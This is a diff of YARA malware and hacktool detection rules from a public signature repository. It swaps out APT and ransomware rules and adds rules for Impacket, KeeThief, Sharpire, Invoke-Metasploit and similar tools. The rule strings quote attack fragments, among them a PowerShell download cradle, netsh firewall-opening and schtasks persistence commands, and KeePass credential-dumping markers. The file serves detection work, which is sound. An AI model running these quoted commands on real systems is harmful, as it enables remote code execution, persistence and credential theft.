+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3873-L3892"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "062311f136d83f64497fd81297360cd4"
-		logic_hash = "85e8087f875c45ce39b7014fc0737dc86f1e18d4643fdbb0a80d18feff774680"
-		score = 100
+		logic_hash = "0d6b961afb98cfaefe930a7bc246b3f087469b752a8d4abb62b2826418fdfd53"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "CC BY 4.0"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.lockbit"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5a0e9a9ce00d843ea95bd5333b6ab50cc5b1dbea648cc819cfe48482513ce842"
 
 	strings:
-		$rc4_alg = { 48 3d 00 01 00 00 74 0c 88 84 04 ?? ?? ?? ?? 48 ff c0 eb ec 29 c9 41 b8 ?? ?? ?? ?? 4c 8d 0d 15 7b 00 00 45 31 d2 48 81 f9 00 01 00 00 74 34 44 8a 9c 0c ?? ?? ?? ?? 45 00 da 89 c8 99 41 f7 f8 46 02 14 0a 41 0f b6 c2 8a 94 04 ?? ?? ?? ?? 88 94 0c ?? ?? ?? ?? 44 88 9c 04 ?? ?? ?? ?? 48 ff c1 eb c3 29 c0 48 8b 0d 14 9e 00 00 31 d2 45 29 c0 48 3d ?? ?? ?? ?? 74 4b 41 ff c0 45 0f b6 c0 46 8a 8c 04 ?? ?? ?? ?? 44 00 ca 44 0f b6 d2 46 8a 9c 14 ?? ?? ?? ?? 46 88 9c 04 ?? ?? ?? ?? 46 88 8c 14 ?? ?? ?? ?? 46 02 8c 04 ?? ?? ?? ?? 45 0f b6 c9 46 8a 8c 0c ?? ?? ?? ?? 44 30 0c 01 48 ff c0 eb ad }
+		$x1 = "\\obj\\Debug\\AllTheThings.pdb" ascii
+		$x2 = "AllTheThings.exe" fullword wide
+		$x3 = "\\AllTheThings.dll" ascii
+		$x4 = "Hello From Main...I Don't Do Anything" fullword wide
+		$x5 = "I am a basic COM Object" fullword wide
+		$x6 = "I shouldn't really execute either." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $rc4_alg
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_Redmimicry_Agent
+rule SIGNATURE_BASE_Impacket_Keyword : FILE
 {
 	meta:
-		description = "matches the RedMimicry agent executable and payload"
-		author = "mirar@chaosmail.org"
-		id = "a4d4ec77-4a0d-5afd-9181-85433e8b5fda"
-		date = "2020-06-22"
-		modified = "2023-01-06"
-		reference = "https://redmimicry.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_redmimicry.yar#L2-L26"
+		description = "Detects Impacket Keyword in Executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a92962e6-1b05-583b-8b06-f226bdea88e2"
+		date = "2017-08-04"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3894-L3911"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "645da2764ca911c4aae80b90622d2c61933dee929403858fc49f7bc0d44300c6"
-		score = 75
+		logic_hash = "92a911dc36f8e74ad49ae09ef4dd997b968a2dde46a7500c98983fafb84a086e"
+		score = 60
 		quality = 85
-		tags = ""
-		sharing = "tlp:white"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9388c78ea6a78dbea307470c94848ae2481481f593d878da7763e649eaab4068"
+		hash2 = "2f6d95e0e15174cfe8e30aaa2c53c74fdd13f9231406b7103da1e099c08be409"
 
 	strings:
-		$reg0 = "HKEY_CURRENT_USER\\" ascii
-		$reg1 = "HKEY_LOCAL_MACHINE\\" ascii
-		$reg2 = "HKEY_CURRENT_CONFIG\\" ascii
-		$reg3 = "HKEY_CLASSES_ROOT\\" ascii
-		$cmd0 = "C:\\Windows\\System32\\cmd.exe" ascii fullword
-		$lua0 = "client_recv" ascii fullword
-		$lua1 = "client_send" ascii fullword
-		$lua2 = "$LuaVersion: " ascii
-		$sym0 = "VirtualAllocEx" wide fullword
-		$sym1 = "kernel32.dll" wide fullword
+		$s1 = "impacket.smb(" ascii
+		$s2 = "impacket.ntlm(" ascii
+		$s3 = "impacket.nmb(" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 14000KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_Redmimicry_Winntiloader
+rule SIGNATURE_BASE_Passwordspro : FILE
 {
 	meta:
-		description = "matches the Winnti 'Cooper' loader version used for the RedMimicry breach emulation"
-		author = "mirar@chaosmail.org"
-		id = "a8be1377-faa0-560d-a12c-0369b1f91180"
-		date = "2020-06-22"
-		modified = "2023-01-10"
-		reference = "https://redmimicry.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_redmimicry.yar#L28-L59"
+		description = "Auto-generated rule - file PasswordsPro.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c749f883-364e-5f65-9eb8-3dcd74495f7c"
+		date = "2017-08-27"
+		modified = "2025-04-14"
+		reference = "PasswordPro"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3924-L3942"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d8ef457ac41a7c45cc7e97330bdd3de12eb3391c03d0a6a87ddc669c841c325d"
+		logic_hash = "24887c3a7e4997c9a4e5d3317a5684b0eca7ccc0ffb213660dd9b37bb220f514"
 		score = 75
 		quality = 85
-		tags = ""
-		sharing = "tlp:white"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5b3d6654e6d9dc49ee1136c0c8e8122cb0d284562447abfdc05dfe38c79f95bf"
 
 	strings:
-		$s0 = "Cooper" ascii fullword
-		$s1 = "stone64.dll" ascii fullword
-		$decoding_loop = { 49 63 D0 43 8D 0C 01 41 FF C0 42 32 0C 1A 0F B6 C1 C0 E9 04 C0 E0 04 02 C1 42 88 04 1A 44 3B 03 72 DE }
+		$s1 = "No users marked for attack or all marked users already have passwords found!" fullword ascii
+		$s2 = "%s\\PasswordsPro.ini.Dictionaries(%d)" fullword ascii
+		$s3 = "Passwords processed since attack start:" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Hiddencobra_Enc_PK_Header : HIDDEN_COBRA TYPEFRAME FILE
+
+rule SIGNATURE_BASE_Passwordpro_NTLM_DLL : FILE
 {
 	meta:
-		description = "Hidden Cobra - Detects trojan with encrypted header"
-		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
-		id = "5d7001b3-162c-5a97-a740-1b8e33d4aa9e"
-		date = "2018-04-12"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ar18_165a.yar#L2-L19"
+		description = "Auto-generated rule - file NTLM.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cc86b868-000f-56b1-91cd-4aa8caace1df"
+		date = "2017-08-27"
+		modified = "2025-04-14"
+		reference = "PasswordPro"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3944-L3962"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d0c8345b69e5f421fd93bc239031f2e51a120ae64be1eca0c1fdae2aa55ac42a"
+		logic_hash = "1021fe1a4c7a237d7a7cfcb1db8fa5e6fa640d3dd9f14ed37910a6b847717d36"
 		score = 75
 		quality = 85
-		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
-		incident = "10135536"
-		category = "hidden_cobra"
-		family = "TYPEFRAME"
-		hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "47d4755d31bb96147e6230d8ea1ecc3065da8e557e8176435ccbcaea16fe50de"
 
 	strings:
-		$s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }
-		$s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }
-		$s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }
+		$s1 = "NTLM.dll" fullword ascii
+		$s2 = "Algorithm: NTLM" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and pe.exports ( "GetHash" ) and pe.exports ( "GetInfo" ) and ( all of them ) )
 }
-rule SIGNATURE_BASE_APT_Hiddencobra_Import_Obfuscation_2 : HIDDEN_COBRA TYPEFRAME FILE
+rule SIGNATURE_BASE_Keethief_PS : FILE
 {
 	meta:
-		description = "Hidden Cobra - Detects remote access trojan"
-		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
-		id = "bc139580-a55b-514f-8a4e-ca1402ce3ad9"
-		date = "2018-04-12"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ar18_165a.yar#L21-L41"
+		description = "Detects component of KeeTheft - KeePass dump tool - file KeeThief.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9a54e8d1-3cae-51e8-8da0-024ac25dc6d0"
+		date = "2017-08-29"
+		modified = "2025-04-14"
+		reference = "https://github.com/HarmJ0y/KeeThief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3974-L3991"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d52fc053afc6b3beb35a6dfd0f9b3714a5bad4e9b0dcfcce7be87d65f0a0c23e"
+		logic_hash = "8d3d4ff3b854c5efad99e6f20121b16d5f2f0a31a4c8efd87a937f857923a5e1"
 		score = 75
 		quality = 85
-		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
-		incident = "10135536"
-		category = "hidden_cobra"
-		family = "TYPEFRAME"
-		hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a3b976279ded8e64b548c1d487212b46b03aaec02cb6e199ea620bd04b8de42f"
 
 	strings:
-		$s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F}
-		$s1 = {B6 DF 01 FD 48 B5 }
-		$s2 = {B6 D5 0E F3 4E B5 }
-		$s3 = {B7 DF 0E EE }
-		$s4 = {B6 DF 03 FC }
-		$s5 = {A7 D3 03 FC }
+		$x1 = "$WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"" fullword ascii
+		$x2 = "if($KeePassProcess.FileVersion -match '^2\\.') {" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
+		( uint16( 0 ) == 0x7223 and filesize < 1000KB and ( 1 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_APT_NK_AR18_165A_Hiddencobra_Import_Deob : HIDDEN_COBRA TYPEFRAME FILE
+rule SIGNATURE_BASE_Keetheft_EXE : FILE
 {
 	meta:
-		description = "Hidden Cobra - Detects installed proxy module as a service"
-		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
-		id = "f403d589-be35-57a7-9675-f92657c11acc"
-		date = "2018-04-12"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ar18_165a.yar#L43-L60"
+		description = "Detects component of KeeTheft - KeePass dump tool - file KeeTheft.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "65531239-c5fa-5285-8f44-2d858e211c9b"
+		date = "2017-08-29"
+		modified = "2025-04-14"
+		reference = "https://github.com/HarmJ0y/KeeThief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3993-L4012"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ae769e62fef4a1709c12c9046301aa5d"
-		hash = "e48fe20eblf5a5887f2ac631fed9ed63"
-		logic_hash = "2eff83738ca4f2db8327c1ee2a9539d7ce882a315025a656d391c16079e432cb"
+		logic_hash = "a6019248ad9708b1508fdf77a2ecbe92a7e8aac916fbca88aec117abeb07b9a0"
 		score = 75
 		quality = 85
-		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
-		incident = "10135536"
-		category = "hidden_cobra"
-		family = "TYPEFRAME"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f06789c3e9fe93c165889799608e59dda6b10331b931601c2b5ae06ede41dc22"
 
 	strings:
-		$ = { 8a 01 3c 62 7c 0a 3c 79 7f 06 b2 db 2a d0 88 11 8a 41 01 41 84 c0 75 e8}
-		$ = { 8A 08 80 F9 62 7C 0B 80 F9 79 7F 06 82 DB 2A D1 88 10 8A 48 01 40 84 C9 75 E6}
+		$x1 = "Error: Could not create a thread for the shellcode" fullword wide
+		$x2 = "Could not find address marker in shellcode" fullword wide
+		$x3 = "GenerateDecryptionShellCode" fullword ascii
+		$x4 = "KeePassLib.Keys.KcpPassword" fullword wide
+		$x5 = "************ Found a CompositeKey! **********" fullword wide
+		$x6 = "*** Interesting... there are multiple .NET runtimes loaded in KeePass" fullword wide
+		$x7 = "GetKcpPasswordInfo" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_APT_NK_AR18_165A_1 : FILE
+rule SIGNATURE_BASE_Keetheft_Out_Shellcode : FILE
 {
 	meta:
-		description = "Detects APT malware from AR18-165A report by US CERT"
+		description = "Detects component of KeeTheft - KeePass dump tool - file Out-Shellcode.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "45f5205d-7f69-5646-aef8-f95d139f9720"
-		date = "2018-06-15"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ar18_165a.yar#L62-L76"
+		id = "1263ad5d-5d50-50e6-ad78-9d5e4e16634b"
+		date = "2017-08-29"
+		modified = "2025-04-14"
+		reference = "https://github.com/HarmJ0y/KeeThief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4014-L4028"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7b87c537c9ff38329a5e1e39d5ad1d6cef724c580f246721443eab603534b29d"
+		logic_hash = "2d536edf1a40defc3b3aa7ce8e595c53e7dd3b7f1daea772c13319ee5bf7675e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359"
+		hash1 = "2afb1c8c82363a0ae43cad9d448dd20bb7d2762aa5ed3672cd8e14dee568e16b"
 
 	strings:
-		$s1 = "netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=%d action=allow enable=yes" fullword wide
-		$s2 = "netsh.exe firewall add portopening TCP %d \"PortOpenning\" enable" fullword wide
+		$x1 = "Write-Host \"Shellcode length: 0x$(($ShellcodeLength + 1).ToString('X4'))\"" fullword ascii
+		$x2 = "$TextSectionInfo = @($MapContents | Where-Object { $_ -match '\\.text\\W+CODE' })[0]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		( filesize < 2KB and 1 of them )
 }
-rule SIGNATURE_BASE_Oilrig_Strings_Oct17 : FILE
+rule SIGNATURE_BASE_Sharpire : FILE
 {
 	meta:
-		description = "Detects strings from OilRig malware and malicious scripts"
+		description = "Auto-generated rule - file Sharpire.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "edf7c7ca-0c58-5507-8d99-83078ff8947a"
-		date = "2017-10-18"
+		id = "747f2798-4f93-5073-b358-969060a1c937"
+		date = "2017-09-23"
 		modified = "2022-12-21"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_oct17.yar#L11-L28"
+		reference = "https://github.com/0xbadjuju/Sharpire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4038-L4061"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3987fa1ccb215edeb0d36c947fd6d7a24847ea854d3f355d1aef4b000f55e710"
+		logic_hash = "1437b4c5229761bcc18d97ea6328866f4b9c763461fa6ecb5c18e6f3961c3114"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "327a1dc2876cd9d7f6a5b3777373087296fc809d466e42861adcf09986c6e587"
 
 	strings:
-		$x1 = "%localappdata%\\srvHealth.exe" fullword wide ascii
-		$x2 = "%localappdata%\\srvBS.txt" fullword wide ascii
-		$x3 = "Agent Injector\\PolicyConverter\\Inner\\obj\\Release\\Inner.pdb" ascii
-		$x4 = "Agent Injector\\PolicyConverter\\Joiner\\obj\\Release\\Joiner.pdb" ascii
-		$s3 = ".LoadDll(\"Run\", arg, \"C:\\\\Windows\\\\" ascii
+		$x1 = "\\obj\\Debug\\Sharpire.pdb" ascii
+		$x2 = "[*] Upload of $fileName successful" fullword wide
+		$s1 = "no shell command supplied" fullword wide
+		$s2 = "/login/process.php" fullword wide
+		$s3 = "invokeShellCommand" fullword ascii
+		$s4 = "..Command execution completed." fullword wide
+		$s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide
+		$s6 = "/admin/get.php" fullword wide
+		$s7 = "[!] Error in stopping job: " fullword wide
 
 	condition:
-		filesize < 800KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) and 3 of them ) )
 }
-rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples1 : FILE
+rule SIGNATURE_BASE_Invoke_Metasploit : FILE
 {
 	meta:
-		description = "Detects OilRig malware from Unit 42 report in October 2017"
+		description = "Detects Invoke-Metasploit Payload"
 		author = "Florian Roth (Nextron Systems)"
-		id = "237fe7af-a2ab-51ae-bc96-3af46b08622a"
-		date = "2017-10-18"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/JQVfFP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_oct17.yar#L42-L61"
+		id = "40452884-df3f-5b49-ad10-05006cb115f2"
+		date = "2017-09-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/jaredhaight/Invoke-MetasploitPayload/blob/master/Invoke-MetasploitPayload.ps1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4071-L4086"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d7e659440e3abc7355f2e21ea8f63cfb7b17b5715e4575bdccf9d646ed47db20"
+		logic_hash = "7ef174008517b101be844e30890626378f49a275bad3f08ce25fb8d6118c77c3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "119c64a8b35bd626b3ea5f630d533b2e0e7852a4c59694125ff08f9965b5f9cc"
-		hash2 = "0ccb2117c34e3045a4d2c0d193f1963c8c0e8566617ed0a561546c932d1a5c0c"
+		hash1 = "b36d3ca7073741c8a48c578edaa6d3b6a8c3c4413e961a83ad08ad128b843e0b"
 
 	strings:
-		$s1 = "###$$$TVqQAAMAAAAEAAAA" ascii
-		$s2 = "C:\\Users\\J-Win-7-32-Vm\\Desktop\\error.jpg" fullword wide
-		$s3 = "$DATA = [System.Convert]::FromBase64String([IO.File]::ReadAllText('%Base%'));[io.file]::WriteAllBytes(" ascii
-		$s4 = " /c echo powershell > " fullword wide ascii
-		$s5 = "\\Libraries\\servicereset.exe" wide
-		$s6 = "%DestFolder%" fullword wide ascii
+		$s1 = "[*] Looks like we're 64bit, using regular powershell.exe" ascii wide
+		$s2 = "[*] Kicking off download cradle in a new process"
+		$s3 = "Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+''');'"
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 3000KB and 2 of them
+		( filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples2 : FILE
+rule SIGNATURE_BASE_Powershell_Mal_Hacktool_Gen : FILE
 {
 	meta:
-		description = "Detects OilRig malware from Unit 42 report in October 2017"
+		description = "Detects PowerShell hack tool samples - generic PE loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08771b23-1d0e-5da7-b42c-005ed257e2d1"
-		date = "2017-10-18"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/JQVfFP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_oct17.yar#L63-L82"
+		id = "d1fc4594-d816-5d02-bff6-3f220477b555"
+		date = "2017-11-02"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4088-L4104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ad00c7293f61f1b5528c3eea0dc32c10d40aeacc194be84a7f64d19b069f1add"
+		logic_hash = "273222cde3ff155cef09c25192dcb4865179e8172e625fe8f43b21a13fe1a170"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fcad263d0fe2b418db05f47d4036f0b42aaf201c9b91281dfdcb3201b298e4f4"
-		hash2 = "33c187cfd9e3b68c3089c27ac64a519ccc951ccb3c74d75179c520f54f11f647"
+		hash1 = "d442304ca839d75b34e30e49a8b9437b5ab60b74d85ba9005642632ce7038b32"
 
 	strings:
-		$x1 = "PolicyConverter.exe" fullword wide
-		$x2 = "SrvHealth.exe" fullword wide
-		$x3 = "srvBS.txt" fullword wide
-		$s1 = "{a3538ba3-5cf7-43f0-bc0e-9b53a98e1643}, PublicKeyToken=3e56350693f7355e" fullword wide
-		$s2 = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe" fullword wide
+		$x1 = "$PEBytes32 = 'TVqQAAMAAAAEAAAA" wide
+		$x2 = "Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp" fullword wide
+		$x3 = "@($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword wide
+		$x4 = "(Shellcode: LoadLibraryA.asm)" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 2 of ( $x* ) or 3 of them )
+		filesize < 8000KB and 1 of them
 }
-
-rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples3 : FILE
+rule SIGNATURE_BASE_Sig_Remoteadmin_1 : FILE
 {
 	meta:
-		description = "Detects OilRig malware from Unit 42 report in October 2017"
+		description = "Detects strings from well-known APT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e26510bd-d183-566a-a185-ebed7a81401c"
-		date = "2017-10-18"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/JQVfFP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_oct17.yar#L84-L116"
+		id = "da55084c-ec1f-5800-a614-189dce7b5820"
+		date = "2017-12-03"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4106-L4120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a4984cf33e7b0e0dae264ed11caae6cfab9db2a6047a46ec41c28b5637b4589b"
-		score = 75
-		quality = 81
+		logic_hash = "81912bbfc1f6ac3ec7c54fc935b9ed531c97ad509cf2c096a19e638836cd0baf"
+		score = 45
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821"
 
 	strings:
-		$x1 = "cmd /c schtasks /query /tn TimeUpdate > NUL 2>&1" ascii
-		$x2 = "schtasks /create /sc minute /mo 0002 /tn TimeUpdate /tr" fullword ascii
-		$x3 = "-c  SampleDomain.com -m scheduleminutes" fullword ascii
-		$x4 = ".ntpupdateserver.com" fullword ascii
-		$x5 = ".msoffice365update.com" fullword ascii
-		$s1 = "out.exe" fullword ascii
-		$s2 = "\\Win32Project1\\Release\\Win32Project1.pdb" ascii
-		$s3 = "C:\\windows\\system32\\cmd.exe /c (" ascii
-		$s4 = "Content-Disposition: form-data; name=\"file\"; filename=\"a.a\"" fullword ascii
-		$s5 = "Agent configured successfully" fullword ascii
-		$s6 = "\\runlog*" ascii
-		$s7 = "can not specify username!!" fullword ascii
-		$s8 = "Agent can not be configured" fullword ascii
-		$s9 = "%08lX%04hX%04hX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX" fullword ascii
-		$s10 = "!!! can not create output file !!!" fullword ascii
+		$ = "Radmin, Remote Administrator" wide
+		$ = "Radmin 3.0" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "538805ecd776b9a42e71aebf94fde1b1" or pe.imphash ( ) == "861ac226fbe8c99a2c43ff451e95da97" or ( 1 of ( $x* ) or 3 of them ) )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Crime_Dearcry_Mar2021_1 : FILE
+rule SIGNATURE_BASE_Remcom_Remotecommandexecution
 {
 	meta:
-		description = "Triggers on strings of known DearCry samples"
-		author = "Nils Kuhnert"
-		id = "d9714502-f1ea-5fe8-b0ac-1f7a9a30d8f5"
-		date = "2021-03-12"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/phillip_misner/status/1370197696280027136"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_dearcry_ransom.yar#L1-L27"
+		description = "Detects strings from RemCom tool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "90b4ce3c-a690-5b6e-95e8-7e5dc8270152"
+		date = "2017-12-28"
+		modified = "2025-04-14"
+		reference = "https://goo.gl/tezXZt"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4122-L4137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e55507475888087c84f9624f82516e8a40aaf59bf2fbea72129a1dd134b28110"
-		score = 75
+		logic_hash = "c39a09c8d0c1799febcb4d9eafece43f8b21e7ffc277fdfad6c235eb1a201697"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		hash1 = "2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff"
-		hash2 = "e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6"
